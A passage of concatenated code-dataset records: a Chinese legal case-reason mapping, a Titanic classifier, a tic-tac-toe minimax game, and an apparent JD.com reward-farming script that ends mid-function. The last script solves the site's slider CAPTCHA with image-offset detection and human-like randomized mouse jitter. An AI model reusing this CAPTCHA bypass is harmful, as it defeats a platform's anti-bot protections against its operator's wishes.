u'铁路运输人身损害责任纠纷': u'侵权责任纠纷',\r\n    u'侵害商业秘密纠纷': u'不正当竞争纠纷',\r\n    u'债权人代位权纠纷': u'合同纠纷',\r\n    u'商业秘密合同': u'知识产权合同纠纷',\r\n    u'非法携带武器、管制刀具、爆炸物参加集会、游行、示威罪': u'妨害社会管理秩序罪',\r\n    u'娱乐服务合同纠纷': u'合同纠纷',\r\n    u'非法制造、买卖、运输、邮寄、储存枪支、弹药、爆炸物罪': u'危害公共安全罪',\r\n    u'证券': u'信用证纠纷',\r\n    u'人身保险合同纠纷': u'保险纠纷',\r\n    u'股金': u'信用证纠纷',\r\n    u'公司解散纠纷': u'与公司有关的纠纷',\r\n    u'网络域名合同纠纷': u'知识产权合同纠纷',\r\n    u'申请支付令': u'督促程序案件',\r\n    u'中外合资经营企业承包经营合同纠纷': u'与企业有关的纠纷',\r\n    u'执行损害': u'侵权责任纠纷',\r\n    u'取水权纠纷': u'用益物权纠纷',\r\n    u'因申请诉前停止侵害注册商标专用权损害责任纠纷': u'知识产权权属侵权纠纷',\r\n    u'海损': u'海事海商纠纷',\r\n    u'其他科技成果': u'知识产权权属侵权纠纷',\r\n    u'聚众冲击军事禁区罪': u'危害国防利益罪',\r\n    
u'放纵制售伪劣商品犯罪行为罪': u'渎职罪',\r\n    u'居间合同': u'合同纠纷',\r\n    u'非法出租、出借枪支罪': u'危害公共安全罪',\r\n    u'经济补偿金纠纷': u'劳动争议',\r\n    u'车辆租赁': u'合同纠纷',\r\n    u'违规出具金融票证罪': u'破坏社会主义市场经济秩序罪',\r\n    u'牧业承包合同纠纷': u'合同纠纷',\r\n    u'公司证照返还纠纷': u'与公司有关的纠纷',\r\n    u'战时造谣惑众罪': u'军人违反职责罪',\r\n    u'招摇撞骗罪': u'妨害社会管理秩序罪',\r\n    u'植物新品种实施许可合同纠纷': u'知识产权合同纠纷',\r\n    u'产品运输者责任纠纷': u'侵权责任纠纷',\r\n    u'申请诉中财产保全': u'申请保全案件',\r\n    u'劳务派遣工作人员侵权责任纠纷': u'侵权责任纠纷',\r\n    u'组织、领导、参加恐怖组织罪': u'危害公共安全罪',\r\n    u'伪造产地纠纷': u'不正当竞争纠纷',\r\n    u'海上通海水域运输联营合同纠纷': u'海事海商纠纷',\r\n    u'违法发放贷款罪': u'破坏社会主义市场经济秩序罪',\r\n    u'擅自进口固体废物罪': u'妨害社会管理秩序罪',\r\n    u'申请诉前证据保全': u'申请保全案件',\r\n    u'合作创作合同纠纷': u'知识产权合同纠纷',\r\n    u'变更赡养关系纠纷': u'婚姻家庭纠纷',\r\n    u'定金合同': u'合同纠纷',\r\n    u'股票回购合同纠纷': u'证券纠纷',\r\n    u'生产、销售不符合标准的医用器材罪': u'破坏社会主义市场经济秩序罪',\r\n    u'非法出售发票罪': u'破坏社会主义市场经济秩序罪',\r\n    u'叛逃罪': u'危害国家安全罪',\r\n    u'清偿行为': u'与破产有关的纠纷',\r\n    u'信用证': u'信用证纠纷',\r\n    u'教育培训': u'合同纠纷',\r\n    u'结算资金': u'信用证纠纷',\r\n    u'非法经营罪': u'破坏社会主义市场经济秩序罪',\r\n    u'社会保险纠纷': u'劳动争议',\r\n    u'非法吸收公众存款罪': u'破坏社会主义市场经济秩序罪',\r\n    u'著作权侵权': u'知识产权权属侵权纠纷',\r\n    u'请求变更公司登记纠纷': u'与公司有关的纠纷',\r\n    u'私放俘虏罪': u'军人违反职责罪',\r\n    u'信用证欺诈纠纷': u'信用证纠纷',\r\n    u'海运': u'海事海商纠纷',\r\n    u'船': u'海事海商纠纷',\r\n    u'外观设计专利实施许可合同纠纷': u'知识产权合同纠纷',\r\n    u'保证合同纠纷': u'合同纠纷',\r\n    u'录音录像制作者权权属纠纷': u'知识产权权属侵权纠纷',\r\n    u'恢复原状纠纷': u'物权保护纠纷',\r\n    u'广告合同纠纷': u'合同纠纷',\r\n    u'意外伤害保险': u'保险纠纷',\r\n    u'经济适用房转让': u'合同纠纷',\r\n    u'重大责任事故罪': u'危害公共安全罪',\r\n    u'遗弃罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'报复陷害罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'企业借贷纠纷': u'合同纠纷',\r\n    u'银行卡纠纷': u'合同纠纷',\r\n    u'占有排除妨害纠纷': u'占有保护纠纷',\r\n    u'一般人格权纠纷': u'人格权纠纷',\r\n    u'传播淫秽物品罪': u'妨害社会管理秩序罪',\r\n    u'拍卖转让协议': u'合同纠纷',\r\n    u'侵害商标权纠纷': u'知识产权权属侵权纠纷',\r\n    u'期货欺诈': u'期货交易纠纷',\r\n    u'群众性': u'侵权责任纠纷',\r\n    u'船舶触碰损害责任纠纷': u'海事海商纠纷',\r\n    u'债务支付': u'宣告失踪、宣告死亡案件',\r\n    u'申请诉前停止侵害专利权': u'申请诉前停止侵害知识产权案件',\r\n    u'房地产价格评估': u'合同纠纷',\r\n    u'颠覆国家政权罪': u'危害国家安全罪',\r\n    u'房屋拆迁': u'合同纠纷',\r\n    u'监护人责任纠纷': u'侵权责任纠纷',\r\n    u'公益信托': u'信托纠纷',\r\n    u'伪造、变造股票、公司、企业债券罪': u'破坏社会主义市场经济秩序罪',\r\n    u'保险': u'保险纠纷',\r\n    u'徇私舞弊减刑、假释、暂予监外执行罪': u'渎职罪',\r\n    u'单位受贿罪': u'贪污贿赂罪',\r\n    u'航空运输': u'侵权责任纠纷',\r\n    u'战时拒绝、故意延误军事订货罪': u'危害国防利益罪',\r\n    u'徇私舞弊不移交刑事案件罪': u'渎职罪',\r\n    u'操纵期货交易市场责任纠纷': u'期货交易纠纷',\r\n    u'破坏性采矿罪': u'妨害社会管理秩序罪',\r\n    u'表演合同': u'知识产权合同纠纷',\r\n    u'网络域名许可使用合同纠纷': u'知识产权合同纠纷',\r\n    u'医疗损害责任纠纷': u'侵权责任纠纷',\r\n    u'高度危险活动损害责任纠纷': u'侵权责任纠纷',\r\n    u'中外合资经营企业合同纠纷': u'与企业有关的纠纷',\r\n    u'侵害作品署名权纠纷': u'知识产权权属侵权纠纷',\r\n    u'国债回购': u'证券纠纷',\r\n    u'对违法票据承兑、付款、保证罪': u'破坏社会主义市场经济秩序罪',\r\n    u'不当得利纠纷': u'不当得利纠纷',\r\n    u'贪污': u'贪污贿赂罪',\r\n    u'同业拆借纠纷': u'合同纠纷',\r\n    u'债权转股权': u'与企业有关的纠纷',\r\n    u'非法提供麻醉药品、精神药品罪': u'妨害社会管理秩序罪',\r\n    u'产品仓储者责任纠纷': u'侵权责任纠纷',\r\n    u'劳动合同': u'劳动争议',\r\n    u'水上运输财产损害责任纠纷': u'侵权责任纠纷',\r\n    u'重婚罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'林业承包': u'合同纠纷',\r\n    u'技术进口合同纠纷': u'知识产权合同纠纷',\r\n    u'海上通海水域养殖损害责任纠纷': u'海事海商纠纷',\r\n    u'植物新品种权权属纠纷': u'知识产权权属侵权纠纷',\r\n    u'非法种植毒品原植物罪': u'妨害社会管理秩序罪',\r\n    u'地役权纠纷': u'用益物权纠纷',\r\n    u'盗窃罪': u'侵犯财产罪',\r\n    u'人事争议': u'与公司有关的纠纷',\r\n    u'侵害植物新品种权纠纷': u'知识产权权属侵权纠纷',\r\n    u'工程款': u'合同纠纷',\r\n    u'组织出卖人体器官罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'票据代理纠纷': u'票据纠纷',\r\n    u'侵犯商业秘密罪': u'破坏社会主义市场经济秩序罪',\r\n    u'交通肇事罪': u'危害公共安全罪',\r\n    u'非法收购、运输、出售珍贵、濒危野生动物、珍贵、濒危野生动物制品罪': u'妨害社会管理秩序罪',\r\n    u'农村房屋买卖合同纠纷': u'合同纠纷',\r\n    u'人身自由权': u'人格权纠纷',\r\n    u'侵害录音录像制作者权纠纷': u'知识产权权属侵权纠纷',\r\n    u'期货实物交割纠纷': u'期货交易纠纷',\r\n    u'虚假出资、抽逃出资罪': u'破坏社会主义市场经济秩序罪',\r\n    u'生产、销售劣药罪': u'破坏社会主义市场经济秩序罪',\r\n    u'技术委托开发合同纠纷': u'知识产权合同纠纷',\r\n    u'表演者权': u'知识产权权属侵权纠纷',\r\n    u'追收抽逃出资纠纷': u'与破产有关的纠纷',\r\n    u'供用水合同纠纷': u'合同纠纷',\r\n    u'探矿': u'合同纠纷',\r\n    u'集体合同': u'劳动争议',\r\n    u'货运': u'合同纠纷',\r\n    u'人寿保险合同纠纷': u'保险纠纷',\r\n    u'暴动越狱罪': u'妨害社会管理秩序罪',\r\n    u'彩票奖券纠纷': u'合同纠纷',\r\n    
u'侵犯': u'知识产权权属侵权纠纷',\r\n u'房屋买卖': u'合同纠纷',\r\n u'期货经纪': u'期货交易纠纷',\r\n u'商业诋毁纠纷': u'不正当竞争纠纷',\r\n u'商标使用许可': u'知识产权合同纠纷',\r\n u'对外追收债权纠纷': u'与破产有关的纠纷',\r\n u'引诱、容留、介绍卖淫罪': u'妨害社会管理秩序罪',\r\n u'用益物权确认': u'物权保护纠纷',\r\n u'聚众阻碍解救被收买的妇女、儿童罪': u'侵犯公民人身权利、民主权利罪',\r\n u'证券投资基金权利确认纠纷': u'证券纠纷',\r\n u'非法集会、游行、示威罪': u'妨害社会管理秩序罪',\r\n u'被继承人债务清偿纠纷': u'继承纠纷',\r\n u'盗窃、抢夺枪支、弹药、爆炸物、危险物质罪': u'危害公共安全罪',\r\n u'技术服务': u'知识产权合同纠纷',\r\n u'房产': u'所有权纠纷',\r\n u'劳务派遣': u'侵权责任纠纷',\r\n u'玩忽职守罪': u'渎职罪',\r\n u'执行判决、裁定滥用职权罪': u'渎职罪',\r\n u'出版': u'知识产权权属侵权纠纷',\r\n u'证券交易合同纠纷': u'证券纠纷',\r\n u'海难救助合同纠纷': u'海事海商纠纷',\r\n u'背信损害上市公司利益罪': u'破坏社会主义市场经济秩序罪',\r\n u'恶意提起知识产权': u'知识产权权属侵权纠纷',\r\n u'录音': u'知识产权权属侵权纠纷',\r\n u'无因管理': u'知识产权权属侵权纠纷',\r\n u'商标质押': u'知识产权合同纠纷',\r\n u'人格权': u'人格权纠纷',\r\n u'申请认可和执行香港特别行政区仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'企业名称': u'知识产权权属侵权纠纷',\r\n u'技术服务合同纠纷': u'知识产权合同纠纷',\r\n u'网络域名': u'知识产权合同纠纷',\r\n u'重作': u'物权保护纠纷',\r\n u'客运班线': u'合同纠纷',\r\n u'遗赠': u'继承纠纷',\r\n u'走私武器、弹药罪': u'破坏社会主义市场经济秩序罪',\r\n u'非法向外国人出售、赠送珍贵文物罪': u'妨害社会管理秩序罪',\r\n u'辞职': u'人事争议',\r\n u'信用证转让纠纷': u'信用证纠纷',\r\n u'抚养': u'婚姻家庭纠纷',\r\n u'合伙企业': u'信用证纠纷',\r\n u'侵害企业': u'与企业有关的纠纷',\r\n u'测试合同纠纷': u'合同纠纷',\r\n u'确认人民调解协议效力': u'合同纠纷',\r\n u'聚众冲击国家机关罪': u'妨害社会管理秩序罪',\r\n u'企业公司制改造合同纠纷': u'与企业有关的纠纷',\r\n u'证券虚假陈述责任纠纷': u'证券纠纷',\r\n u'教育机构责任纠纷': u'侵权责任纠纷',\r\n u'汽车': u'所有权纠纷',\r\n u'发明': u'知识产权权属侵权纠纷',\r\n u'强迫卖血罪': u'妨害社会管理秩序罪',\r\n u'专利权宣告无效后返还费用纠纷': u'知识产权权属侵权纠纷',\r\n u'别除权纠纷': u'与破产有关的纠纷',\r\n u'一般取回权纠纷': u'与破产有关的纠纷',\r\n u'商品房预售': u'合同纠纷',\r\n u'铁路修建': u'合同纠纷',\r\n u'股东利益': u'信用证纠纷',\r\n u'对有影响力的人行贿罪': u'贪污贿赂罪',\r\n u'企业': u'信用证纠纷',\r\n u'股东知情': u'信用证纠纷',\r\n u'引诱幼女卖淫罪': u'妨害社会管理秩序罪',\r\n u'重大飞行事故罪': u'危害公共安全罪',\r\n u'因申请先予执行损害责任纠纷': u'侵权责任纠纷',\r\n u'海上通海水域运输重大责任事故责任纠纷': u'海事海商纠纷',\r\n u'消防责任事故罪': u'危害公共安全罪',\r\n u'变更抚养关系纠纷': u'婚姻家庭纠纷',\r\n u'确认不侵害商标权纠纷': u'知识产权权属侵权纠纷',\r\n u'非法出售增值税专用发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'相邻土地建筑物利用关系纠纷': u'所有权纠纷',\r\n u'邮寄服务合同纠纷': u'合同纠纷',\r\n u'伪造、出售伪造的增值税专用发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'技术转化合同纠纷': u'知识产权合同纠纷',\r\n u'拐骗儿童罪': u'侵犯公民人身权利、民主权利罪',\r\n u'借用合同': u'合同纠纷',\r\n u'委托代建': u'合同纠纷'\r\n}\r\n\r\n\r\ndef case_reason_mapper(case_reason):\r\n \"\"\"\r\n 匹配案由\r\n :param case_reason:\r\n :return:\r\n \"\"\"\r\n if case_reason in case_map_dict.keys():\r\n result = case_map_dict[case_reason]\r\n else:\r\n result = u'其他'\r\n return result\r\n","sub_path":"source/src/plugins/Lawsuits/CaseReasonMapper.py","file_name":"CaseReasonMapper.py","file_ext":"py","file_size_in_byte":117128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"116122812","text":"#!/usr/bin/env python3\n\nFNAME = \"/home/pi/.photoctl\"\ntry:\n with open(FNAME, \"r\") as ff:\n curr = ff.read().strip()\nexcept IOError:\n # Create the file\n open(FNAME, \"w+\")\n curr = \"START\"\n\nnew = \"PAUSE\" if curr == \"START\" else \"START\"\n\nwith open(FNAME, \"w\") as ff:\n ff.write(new)\nprint(new)\n","sub_path":"togglepause.py","file_name":"togglepause.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"605019884","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 22 10:25:26 2020\r\n\r\n@author: obaris\r\n\"\"\"\r\n\r\n# This Python 3 environment comes with many helpful analytics libraries installed\r\n# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python\r\n# For example, here's several helpful packages to load\r\n\r\nimport numpy as np # linear 
algebra\r\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\r\n\r\n# Input data files are available in the read-only \"../input/\" directory\r\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\r\n\r\nimport os\r\nfor dirname, _, filenames in os.walk('/kaggle/input'):\r\n    for filename in filenames:\r\n        print(os.path.join(dirname, filename))\r\n\r\n# You can write up to 5GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using \"Save & Run All\" \r\n# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session\r\n \r\ntrain_data = pd.read_csv(\"C:/01_Projects/09_CriticalFormulasandTools/PythonScripts/TitanicData/train.csv\")\r\ntrain_data.head()\r\n\r\ntest_data = pd.read_csv(\"C:/01_Projects/09_CriticalFormulasandTools/PythonScripts/TitanicData/test.csv\")\r\ntest_data.head()\r\n\r\ny = train_data[\"Survived\"]\r\n\r\nfeatures = [\"Pclass\", \"Sex\", \"SibSp\", \"Parch\"]\r\nX = pd.get_dummies(train_data[features])\r\nX_test = pd.get_dummies(test_data[features])\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nmodel = RandomForestClassifier()\r\nmodel.fit(X, y)\r\npredictions = model.predict(X_test)\r\n\r\noutput = pd.DataFrame({'PassengerId': test_data.PassengerId, 'Survived': predictions})\r\noutput.to_csv('my_submission.csv', index=False)\r\nprint(\"Your submission was successfully saved!\")\r\n\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import roc_curve, precision_recall_curve, auc, make_scorer, recall_score, accuracy_score, precision_score\r\nfrom sklearn.metrics import confusion_matrix, f1_score\r\n\r\nparam_grid = {\r\n    'n_estimators' : [50, 100, 150, 200, 250, 300, 400, 500],\r\n    'max_features' : ['auto', 'sqrt'],\r\n    'max_depth': [None, 5, 10, 15, 20, 25, 30, 40, 50],\r\n    'min_samples_split': [3, 4, 5, 10, 20],\r\n    'min_samples_leaf': [1, 2, 4],\r\n    'bootstrap': [True, False]\r\n}\r\n\r\nscorers = {\r\n    'precision_score': make_scorer(precision_score),\r\n    'recall_score': make_scorer(recall_score),\r\n    'accuracy_score': make_scorer(accuracy_score),\r\n    'f1_score': make_scorer(f1_score)\r\n}\r\n\r\n\r\ndef grid_search_wrapper(refit_score='f1_score'):\r\n\r\n    \"\"\"fits a GridSearchCV classifier using refit_score for optimization\r\n    prints classifier performance metrics\"\"\"\r\n    \r\n    grid_search = GridSearchCV(model, param_grid, scoring=scorers, refit=refit_score, cv=10, return_train_score=True, n_jobs=-1)\r\n\r\n    grid_search.fit(X, y)\r\n\r\n    # make the predictions (on the training data X; the test set has no labels)\r\n    labels_pred = grid_search.predict(X)\r\n\r\n    print('Best params for {}'.format(refit_score))\r\n    print(grid_search.best_params_)\r\n\r\n    # confusion matrix on the training data\r\n    print('\\nConfusion matrix of Random Forest optimized for {} on the training data:'.format(refit_score))\r\n    print(pd.DataFrame(confusion_matrix(y, labels_pred),\r\n                 columns=['pred_neg', 'pred_pos'], index=['neg', 'pos']))\r\n    return grid_search\r\n\r\ngrid_search_clf = grid_search_wrapper()","sub_path":"TitanicData/TitanicDataset_Kaggle.py","file_name":"TitanicDataset_Kaggle.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"286740084","text":"'''\r\nThis is a simple tic tac toe game that utilizes the algorithm \"Minimax\" in order to find the optimum move without explicitly programming the moves\r\nthe computer 
always takes the x and the player is left with o.\r\nit is impossible to win against the computer, only a Tie or a loss can be achieved.\r\nthere is huge room for improving the code in terms of speed and efficiency, but I think for a game this simple clarity is more important than efficiency.\r\n\r\nCreated by: Musab Schluck\r\n'''\r\n\r\nfrom copy import deepcopy \r\n\r\ndef print_board(): # - Used to print the main board\r\n    for i, value in enumerate(the_board, 1):\r\n        print(value, end = ' ')\r\n        if i%3 == 0: print()\r\n\r\ndef h_move(): # - allowing the human player (o) to play their turn; retries until a free square is picked so a bad entry no longer skips the turn\r\n    while True:\r\n        c = int(input('enter a non-taken number between 1 - 9: '))\r\n        if 1 <= c <= 9 and c == the_board[c-1]:\r\n            the_board[c-1] = current_player\r\n            break\r\n\r\ndef c_move(): # - allowing the computer(x) to play its turn\r\n    c = minimax(the_board, depth(the_board), True)\r\n    c = c[1]\r\n    the_board[c-1] = current_player\r\n\r\ndef play(): # - choosing between two functions to call based on the turn of the game\r\n    global current_player\r\n    if turn%2 == 0:\r\n        current_player = 'o'\r\n        h_move()\r\n    else:\r\n        current_player = 'x'\r\n        c_move()\r\n\r\ndef return_winning(b, player): # - returns true if the given player has won, otherwise returns false\r\n    if (b[0] == player and b[1] == player and b[2] == player)or\\\r\n    (b[3] == player and b[4] == player and b[5] == player)or\\\r\n    (b[6] == player and b[7] == player and b[8] == player)or\\\r\n    (b[0] == player and b[3] == player and b[6] == player)or\\\r\n    (b[1] == player and b[4] == player and b[7] == player)or\\\r\n    (b[2] == player and b[5] == player and b[8] == player)or\\\r\n    (b[0] == player and b[4] == player and b[8] == player)or\\\r\n    (b[2] == player and b[4] == player and b[6] == player):\r\n        return True\r\n    else: return False\r\n    \r\ndef return_empty_values(b): # - returns a list of the non-taken values\r\n    return [x for x in b if isinstance(x, int)]\r\n\r\ndef is_terminal(b): # - returns true if a winning combination is reached\r\n    w_c = [(0,1,2),(3,4,5),(6,7,8),(0,3,6),(1,4,7),(2,5,8),(0,4,8),(2,4,6)]\r\n    for c in w_c:\r\n        if b[c[0]] == b[c[1]] and b[c[1]] == b[c[2]]: return True\r\n    \r\ndef depth(b): # - returns the number of non-taken values in a board\r\n    d = 0\r\n    for i in b:\r\n        if isinstance(i, int): d += 1\r\n    return d\r\n\r\ndef evaluate(b): # - assigning values to boards based on the favorability of player x\r\n    w_c = [(0,1,2),(3,4,5),(6,7,8),(0,3,6),(1,4,7),(2,5,8),(0,4,8),(2,4,6)]\r\n    for c in w_c:\r\n        if b[c[0]] == b[c[1]] and b[c[1]] == b[c[2]] and b[c[2]] == 'x': return [20-depth(b), -1]\r\n        elif b[c[0]] == b[c[1]] and b[c[1]] == b[c[2]] and b[c[2]] == 'o': return [-10+depth(b), -1]\r\n    return [10-depth(b), -1]\r\n\r\ndef moves_boards(b, player = 'x'): # returns a list that has pairs of the moves taken and the lists resulted from taking those moves for example: [ [1,['x',2,3,4,5,6,7,8,9,]], [2,[1,'x',3,4,5,6,7,8,9,]], ... 
]\r\n available_values = [x for x in b if isinstance(x, int)]\r\n possible_boards = []\r\n output = []\r\n for i in available_values:\r\n c = deepcopy(b)\r\n c[i-1] = player\r\n output.append([i,c])\r\n return output\r\n\r\ndef minimax(b, depth_of_the_board, max_player): # - the minimax algorithm that searches the game space and returns the best move possible\r\n if (depth(b) == 0) or (is_terminal(b) == True):\r\n return evaluate(b)\r\n\r\n if max_player:\r\n max_eval, best_move = float(\"-inf\"), -1\r\n for move, child in moves_boards(b):\r\n ev = minimax(child, depth_of_the_board-1, False)[0]\r\n max_eval = max(ev, max_eval)\r\n if ev == max_eval: best_move = move\r\n return max_eval, best_move\r\n\r\n else:\r\n min_eval = float('inf')\r\n for move, child in moves_boards(b, 'o'):\r\n ev = minimax(child, depth_of_the_board-1, True)[0]\r\n min_eval = min(ev, min_eval)\r\n return min_eval, -1\r\n\r\nthe_board = [1, 2, 3, 4, 5, 6, 7, 8, 9]\r\ncurrent_player = 'o'\r\n\r\n\"The Game loop\"\r\n\r\nprint(\"Welcome to this game i hope u enjoy it, please wait a bit for the computer to think\")\r\nfor turn in range(len([x for x in the_board if isinstance(x, str)])+1,10):\r\n play()\r\n print_board()\r\n if return_winning(the_board, current_player)== True:\r\n print('player {} has won the match'.format(current_player))\r\n break\r\n print('--------------------this is the computer turn----------------------')\r\nif return_winning(the_board, current_player) != True: print('it is a Tie') \r\n","sub_path":"c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"630698378","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021/6/25 9:29 上午\n# @File : jd_joy.py\n# @Project : jd_scripts\n# @Desc : 京东APP->我的->宠汪汪\nimport asyncio\nimport json\nimport os\nimport random\nimport aiohttp\nimport moment\nimport ujson\nfrom dateutil.relativedelta import relativedelta\n\nfrom datetime import datetime\n\nfrom utils.console import println\nfrom urllib.parse import unquote, urlencode\nfrom config import USER_AGENT, IMAGES_DIR\nfrom utils.image import save_img, detect_displacement\nfrom utils.browser import open_page, open_browser\n\n\nclass JdJoy:\n \"\"\"\n 宠汪汪, 需要使用浏览器方式进行拼图验证。\n \"\"\"\n # 活动地址\n url = 'https://h5.m.jd.com/babelDiy/Zeus/2wuqXrZrhygTQzYA7VufBEpj4amH/index.html#/pages/jdDog/jdDog'\n\n headers = {\n \"Accept\": \"application/json,text/plain, */*\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-cn\",\n \"Connection\": \"keep-alive\",\n \"Referer\": \"https://h5.m.jd.com/babelDiy/Zeus/2wuqXrZrhygTQzYA7VufBEpj4amH/index.html\",\n \"User-Agent\": USER_AGENT\n }\n\n def __init__(self, pt_pin, pt_key):\n \"\"\"\n :param pt_pin:\n :param pt_key:\n \"\"\"\n self._cookies = [\n {\n 'domain': '.jd.com',\n 'name': 'pt_pin',\n 'value': pt_pin,\n },\n {\n 'domain': '.jd.com',\n 'name': 'pt_key',\n 'value': pt_key,\n }\n ]\n self._aiohttp_cookies = {\n 'pt_pin': pt_pin,\n 'pt_key': pt_key,\n }\n self._pt_pin = unquote(pt_pin)\n self.browser = None # 浏览器对象\n self.page = None # 页面标签对象\n\n async def validate(self):\n \"\"\"\n :return:\n \"\"\"\n if not self.browser:\n self.browser = await open_browser()\n if not self.page:\n self.page = await open_page(self.browser, self.url, USER_AGENT, self._cookies)\n page = self.page\n validator_selector = '#app > div > div > div > div.man-machine > 
div.man-machine-container'\n validator = await page.querySelector(validator_selector)\n if not validator:\n println('{}, 不需要拼图验证...'.format(self._pt_pin))\n return True\n else:\n box = await validator.boundingBox()\n if not box:\n println('{}, 不需要拼图验证...'.format(self._pt_pin))\n return True\n\n println('{}, 需要进行拼图验证...'.format(self._pt_pin))\n\n bg_img_selector = '#man-machine-box > div > div.JDJRV-img-panel.JDJRV-embed > div.JDJRV-img-wrap > ' \\\n 'div.JDJRV-bigimg > img'\n\n slider_img_selector = '#man-machine-box > div > div.JDJRV-img-panel.JDJRV-embed > div.JDJRV-img-wrap > ' \\\n 'div.JDJRV-smallimg > img'\n\n for i in range(10):\n\n println('{}, 正在进行第{}次拼图验证...'.format(self._pt_pin, i + 1))\n println('{}, 等待加载拼图验证背景图片...'.format(self._pt_pin))\n await page.waitForSelector(bg_img_selector)\n\n bg_img_ele = await page.querySelector(bg_img_selector)\n\n println('{}, 等待加载拼图验证滑块图片...'.format(self._pt_pin))\n await page.waitForSelector(slider_img_selector)\n slider_img_ele = await page.querySelector(slider_img_selector)\n\n bg_img_content = await (await bg_img_ele.getProperty('src')).jsonValue()\n slider_img_content = await (await slider_img_ele.getProperty('src')).jsonValue()\n\n bg_image_path = os.path.join(IMAGES_DIR, 'jd_pet_dog_bg_{}.png'.format(self._pt_pin))\n slider_image_path = os.path.join(IMAGES_DIR, 'jd_pet_dog_slider_{}.png'.format(self._pt_pin))\n\n println('{}, 保存拼图验证背景图片:{}!'.format(self._pt_pin, bg_image_path))\n save_img(bg_img_content, bg_image_path)\n\n println('{}, 保存拼图验证滑块图片:{}!'.format(self._pt_pin, slider_image_path))\n save_img(slider_img_content, slider_image_path)\n\n offset = detect_displacement(slider_image_path, bg_image_path)\n println('{}. 拼图偏移量为:{}'.format(self._pt_pin, offset))\n\n slider_btn_selector = '#man-machine-box > div > div.JDJRV-slide-bg > div.JDJRV-slide-inner.JDJRV-slide-btn'\n ele = await page.querySelector(slider_btn_selector)\n box = await ele.boundingBox()\n println('{}, 开始拖动拼图滑块...'.format(self._pt_pin))\n await page.hover(slider_btn_selector)\n await page.mouse.down()\n\n cur_x = box['x']\n cur_y = box['y']\n first = True\n total_delay = 0\n shake_times = 2 # 左右抖动的最大次数\n\n while offset > 0:\n if first:\n # 第一次先随机移动偏移量的%60~80%\n x = int(random.randint(6, 8) / 10 * offset)\n first = False\n elif total_delay >= 2000: # 时间大于2s了, 直接拉满\n x = offset\n else: # 随机滑动5~30px\n x = random.randint(5, 30)\n\n if x > offset:\n offset = 0\n x = offset\n else:\n offset -= x\n\n cur_x += x\n\n delay = random.randint(100, 500)\n steps = random.randint(1, 20)\n total_delay += delay\n println('{}, 拼图offset:{}, delay:{}, steps:{}'.format(self._pt_pin, cur_x, delay, steps))\n await page.mouse.move(cur_x, cur_y,\n {'delay': delay, 'steps': steps})\n\n if shake_times <= 0:\n continue\n\n if total_delay >= 2000:\n continue\n\n num = random.randint(1, 10) # 随机选择是否抖动\n if num % 2 == 1:\n continue\n\n shake_times -= 1\n px = random.randint(1, 20) # 随机选择抖动偏移量\n delay = random.randint(100, 500)\n steps = random.randint(1, 20)\n total_delay += delay\n # 往右拉\n cur_x += px\n println('{}, 拼图向右滑动:offset:{}, delay:{}, steps:{}'.format(self._pt_pin, px, delay, steps))\n await page.mouse.move(cur_x, cur_y,\n {'delay': delay, 'steps': steps})\n\n delay = random.randint(100, 500)\n steps = random.randint(1, 20)\n total_delay += delay\n\n # 往左拉\n cur_x -= px\n println('{}, 拼图向左滑动:offset:{}, delay:{}, steps:{}'.format(self._pt_pin, px, delay, steps))\n await page.mouse.move(cur_x, cur_y,\n {'delay': delay, 'steps': steps})\n println('{}, 第{}次拼图验证, 耗时:{}s.'.format(self._pt_pin, i + 
1, total_delay / 1000))\n await page.mouse.up()\n await asyncio.sleep(3)\n println('{}, 正在获取验证结果, 等待3s...'.format(self._pt_pin))\n slider_img_ele = await page.querySelector(slider_img_selector)\n if slider_img_ele is None:\n println('{}, 第{}次拼图验证, 验证成功!'.format(self._pt_pin, i + 1))\n break\n else:\n println('{}, 第{}次拼图验证, 验证失败, 继续验证!'.format(self._pt_pin, i + 1))\n\n validator = await page.querySelector(validator_selector)\n if not validator:\n println('{}, 已完成拼图验证...'.format(self._pt_pin))\n return True\n else:\n box = await validator.boundingBox()\n if not box:\n println('{}, 已完成拼图验证...'.format(self._pt_pin))\n return True\n else:\n println('{}, 无法完成拼图验证...'.format(self._pt_pin))\n return None\n\n async def request(self, session, path, body=None, method='GET', post_type='json'):\n \"\"\"\n 请求数据\n :param session:\n :param method:\n :param path:\n :param post_type:\n :param body:\n :return:\n \"\"\"\n try:\n default_params = {\n 'reqSource': 'h5',\n 'invokeKey': 'qRKHmL4sna8ZOP9F'\n }\n if method == 'GET' and body:\n default_params.update(body)\n\n url = 'https://jdjoy.jd.com/common/{}'.format(path) + '?' + urlencode(default_params)\n\n if method == 'GET':\n response = await session.get(url)\n else:\n if post_type == 'json':\n content_type = session.headers.get('Content-Type', None)\n if content_type:\n session.headers.pop('Content-Type')\n response = await session.post(url, json=body)\n else:\n session.headers.add('Content-Type', 'application/x-www-form-urlencoded')\n response = await session.post(url, data=body)\n\n text = await response.text()\n data = json.loads(text)\n if not data['errorCode']:\n if 'data' in data:\n return data['data']\n elif 'datas' in data:\n return data['datas']\n return data\n\n if data['errorCode'] == 